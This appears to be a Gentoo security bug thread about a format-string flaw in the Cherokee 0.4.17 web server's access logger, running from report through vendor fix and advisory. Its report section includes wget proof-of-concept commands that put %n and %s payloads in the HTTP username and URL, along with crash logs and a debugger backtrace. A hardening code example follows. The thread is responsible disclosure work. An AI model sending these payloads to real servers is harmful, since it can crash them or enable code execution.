hi,

i have found a remotely exploitable format string bug in the webserver cherokee-0.4.17.

the affected function is located in logger_ncsa.c: cherokee_logger_ncsa_write_string():

ret_t
cherokee_logger_ncsa_write_string (cherokee_logger_ncsa_t *logger, const char *string)
{
    if (logger->accesslog_fd != NULL) {
        int ret;

        ret = fprintf (logger->accesslog_fd, string);
        return (ret > 0) ? ret_ok : ret_error;
    }

    syslog (LOG_INFO, "%s", string);
    return ret_ok;
}

this function is called if a user authenticates to the server with username plus password (via auth_pam) in validator_pass.c:

--- snip ---
ret_t
cherokee_validator_pam_check (cherokee_validator_pam_t *pam, cherokee_connection_t *conn)
{
    ...
    /* Try to authenticate user: */
    ret = _pam_dispatch (pamhandle, 0, 1);
    if (ret != PAM_SUCCESS) {
        cherokee_logger_write_string (CONN_VSRV(conn)->logger,
                                      "PAM: user '%s' - not authenticated: %s",
                                      conn->user->buf, pam_strerror(pamhandle, ret));
        goto unauthorized;
    }
    ...
--- snip ---

demonstration:

client:

bash-2.05b$ wget --http-user=%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x --http-passwd=%n%n%x http://127.0.0.1/private/index.html
--01:12:39--  http://127.0.0.1/private/index.html
           => `index.html'
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... End of file while parsing headers.
Retrying.

--01:12:41--  http://127.0.0.1/private/index.html
  (try: 2) => `index.html'
Connecting to 127.0.0.1:80... failed: Connection refused.
bash-2.05b$

server:

bender root # cherokee -C /etc/cherokee/cherokee.conf
PHP interpreter not found (/usr/lib/cgi-bin/php4). Please install it.
Cherokee Web Server 0.4.17: Listening on port 80, using poll, 1024 fds limit
5 threads, 204 fds in each, standard scheduling policy, TLS disabled
Cherokee feels panic!
Killed
bender root #

server log:

you can find very interesting data in /var/log/cherokee.access:

PAM: user '(null)0ö0öPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication module0ö$ìPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication modulePAM: user '%s' - not authenticated: %s 1@ìd@$G@Û/@$G@°.@°XPAM: user '(null)0ö0öPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication module0ö$ìPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication modulePAM: user '%s' - not authenticated: %s 1@ìd@$G@Û/@$G@ °.@¨X

to be clear: the syslog() function is properly protected - it happens one before...

debugger attached to server:

Attaching to program: /usr/sbin/cherokee, process 23158
Reading symbols from /usr/lib/libcherokee.so.0...done.
Loaded symbols for /usr/lib/libcherokee.so.0
Reading symbols from /lib/libpthread.so.0...done.
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 23158)]
[New Thread 32769 (LWP 23159)]
[New Thread 16386 (LWP 23160)]
[New Thread 32771 (LWP 23161)]
[New Thread 49156 (LWP 23162)]
[New Thread 65541 (LWP 23163)]
Loaded symbols for /lib/libpthread.so.0
Reading symbols from /lib/libdl.so.2...done.
Loaded symbols for /lib/libdl.so.2
Reading symbols from /lib/libc.so.6...done.
[more symbols]
Reading symbols from /usr/lib/cherokee/libcherokee_plain.so...done.
Loaded symbols for /usr/lib/cherokee/libcherokee_plain.so
0x40165a11 in loser_poll () from /lib/libc.so.6
(gdb) step
Single stepping until exit from function loser_poll, which has no line number information.
[Switching to Thread 16384 (LWP 23158)]
0x40165aca in poll () from /lib/libc.so.6
(gdb) step
Single stepping until exit from function poll, which has no line number information.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 65541 (LWP 23163)]
0x4011f753 in strlen () from /lib/libc.so.6
(gdb) backtrace
#0  0x4011f753 in strlen () from /lib/libc.so.6
#1  0x400f6d29 in vfprintf () from /lib/libc.so.6
#2  0x400fcfef in fprintf () from /lib/libc.so.6
#3  0x4030292d in cherokee_logger_ncsa_write_string (logger=0x3a4d4150, string=0x267a <Address 0x267a out of bounds>) at logger_ncsa.c:295
#4  0x4003e7c8 in cherokee_logger_write_string (logger=0x806e150, format=0x3a4d4150 <Address 0x3a4d4150 out of bounds>) at logger.c:156
#5  0x402fdd55 in cherokee_validator_pam_check (pam=0x807ef10, conn=0x807e780) at validator_pam.c:180
#6  0x40042eb0 in cherokee_validator_check (validator=0x0, conn=0x3a4d4150) at validator.c:63
#7  0x40039d44 in cherokee_connection_check_authentication (cnt=0x807e780, plugin_entry=0x806ef18) at connection.c:1296
#8  0x4003f171 in process_active_connections (thd=0x807d090) at thread.c:460
#9  0x4003fce8 in cherokee_thread_step_MULTI_THREAD (thd=0x807d090, dont_block=false) at thread.c:1096
#10 0x4003eb84 in thread_routine (data=0x807d090) at thread.c:73
#11 0x4006b01f in pthread_start_thread () from /lib/libpthread.so.0
#12 0x4016ee6a in clone () from /lib/libc.so.6
(gdb)

another impact:

client:

wget http://127.0.0.1/%s%s%s%s%s%s%s%s%s%s%s%s%s% [+x] %s

serverlog:

127.0.0.1 - - [15/Oct/2004:01:30:58 +0100] "GET /%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$G@pP]è@P`,ú¿$G@`PX¤@P`$G@ÊÃ@``Dú¿$G@$G@`ï@`xú¿ «@ç´´▒©$G@Pçèü°ç$G@Ìû¿ë@u@;@à û¿;@à û¿°@øü¿¯@jî@à û¿ ¤@(@(@ ¤øÿ¿@µ@ ¤@▒øÿ¿$G@ØÌP(¨@ì ¤@u@ÀÀ'À!ý¿a¤ý¿¬ý¿ÿ¿ªÀ@0¤@

we're basically hitting the stack here... we can do everything, send shellcode, write .dtors, etc...

Impact:
-> a successful exploitation of this bug leads to execution of arbitrary code (with server rights, of course)
-> in case of unsuccessful exploitation, this leads to a denial of service.

i think this bug should be fixed upstream, therefore i have not attached a patch for this issue.

author has _not_ yet been informed about this bug.

best regards
florian [rootshell]
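An added example, not part of Florian's report or of the Cherokee sources: the hardened shape of the two-layer logger in C, where the caller's literal format is expanded by a bounded vsnprintf and the result reaches the sink as data, never as the format. pam_failure_line and count_directives are hypothetical helpers; the second is a log-review check for usernames carrying printf conversions such as the %n%n%x probe shown above.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
/* Fixed-format sink: 'msg' is data, never a format string (the one-token
 * change that removes the fprintf(fd, string) defect shown above). */
static int log_write_string(FILE *out, const char *msg)
{
    return fprintf(out, "%s", msg) > 0 ? 0 : -1;
}

/* Formatting happens here; the only format string ever interpreted is 'fmt'. */
static int log_write(FILE *out, const char *fmt, ...)
{
    char buf[512];
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(buf, sizeof buf, fmt, ap);  /* truncates rather than overflows */
    va_end(ap);
    return log_write_string(out, buf);
}

/* Hypothetical helper: log the PAM failure via the hardened path into a tmpfile
 * and read the line back. Returns bytes read, -1 on error. */
static int pam_failure_line(const char *user, const char *err, char *dst, size_t n)
{
    FILE *f = tmpfile();
    size_t got = 0;
    if (f == NULL) return -1;
    if (log_write(f, "PAM: user '%s' - not authenticated: %s", user, err) == 0) {
        rewind(f);
        got = fread(dst, 1, n - 1, f);
    }
    dst[got] = '\0';
    fclose(f);
    return (int)got;
}

/* Log-review helper: count printf conversions in an untrusted field and flag
 * '%n', the write primitive. A literal '%%' is not counted. */
static int count_directives(const char *s, int *has_n)
{
    int count = 0;
    *has_n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        count++;
        if (s[1] == 'n') *has_n = 1;
    }
    return count;
}
```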
Audit team, please peer-review this one before we take it to upstream and/or vendor-sec.
This is confirmed. Easy DoS, potential code execution (I'll have to spend more time on that part; I haven't managed RCE yet). Time to contact the Cherokee dev team and possibly forward to vendor-sec. I'm writing to them now. Thanks, rootshell.
Krispy: don't forget to credit Florian if you write directly upstream. Maybe it's best if he writes to them himself. klieber/solar: do you think this one needs to be coordinated with vendor-sec? Who ships cherokee?
hi,

i just got this email (as CC) from the cherokee maintainer:

-- mail --
Hi Dan,

First of all, thank you very much for the report :-)

There are two patched versions that correct this bug:

- The 0.4.17.1: It is the fixed 0.4.17:
  ftp://alobbs.com/cherokee/0.4/0.4.17/cherokee-0.4.17.1.tar.gz

- The 0.4.18b25: It is a beta of the incoming release of Cherokee. It contains new features, but some of them are unfinished yet:
  http://alobbs.com/tmp/cherokee-0.4.18b25.tar.gz
-- eof --

so please bump up to version 0.4.17.1

safe to go public now...

best regards
florian [rootshell]
this is the debian maintainer, btw: http://people.debian.org/~rcardenes/#cherokee

seems that other distributions do _not_ ship cherokee by default... (at least i can't find 'official' rpms)

best regards
florian [rootshell]
Stuart, please provide an updated ebuild or CC the right dev, as this is not a public bug.
Updated ebuild committed, and marked stable on x86. Just needs marking stable on ppc now.
CC'ing pvdabeel instead of ppc as this bug is not public. Pieter please test and mark 0.4.17.1 stable.
This is public now (see http://alobbs.com/) ppc: please mark stable.
Stable on ppc.
GLSA 200411-02